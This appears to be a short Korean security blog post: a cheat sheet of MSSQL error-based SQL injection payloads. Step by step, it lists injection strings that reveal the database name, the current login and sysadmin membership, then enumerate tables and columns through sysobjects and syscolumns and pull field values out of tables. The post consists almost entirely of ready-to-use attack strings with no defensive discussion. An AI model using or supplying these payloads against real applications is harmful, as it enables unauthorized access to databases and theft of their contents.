본문으로 바로가기

MSSQL Error Based SQL Injection

category Security/Web 2014. 10. 24. 02:09
반응형

[MS-SQL Error Based SQLi]


0. 데이터베이스 조회

- ' and 1=(db_name())--


1. 사용자계정 조회 및 권한 조회

- ' and 1=(select system_user as 'login name')--

- ' and 1=(select system_user)--

- ' and quotename(is_srvrolemember('sysadmin','sa'))=0--

- ' and quotename(is_srvrolemember(0x730079007300610064006D0069006E))=0--

(결과 값이 1이면 true 0이면 false)


2. 사용자 이름 조회

- ' and 1=(user)--

- ' and 1=(select user as 'user name')--

- ' and 0<>user--


3. TABLE명 획득


- ' and 1=(select name from (select row_number() over(order by name) as rowid, name from sysobjects where xtype=0x55)T where rowid=1)--

(rowid를 증가시키면서 알아낸다)

 

- ' and 1=(select top 1 name from sysobjects where xtype='u')--

- ' and 1=(select top 1 name from sysobjects where xtype=char(85))--

- ' and 1=(select top 1 name from sysobjects where xtype='u' and name not in('테이블명'))--


4. 사용자 생성테이블 고유ID 조회

- ' and 1=(select id from sysobjects where xtype='u' and name='테이블명' and uid>(str(id)))-- 


5. 컬럼명 획득


- ' and 1=(select name from(select row_number() over(order by col.name) as rowid,col.name from sysobjects tab,syscolumns col where tab.id=col.id and tab.name='테이블명')T where rowid=1)-- (rowid 를 증가시키면서 알아낸다)


- ' and 1=(select top 1 name from syscolumns where id=테이블id)--

- ' and 1=(select top 1 name from syscolumns where id=테이블id and name not in('컬럼명'))--


6. 필드값 조회

- ' and 1=(select top 1 컬럼명 from 테이블명)--

- ' and 1=(select top 1 컬럼명 from 테이블명 where 컬럼명 not in('첫번째값'))--

반응형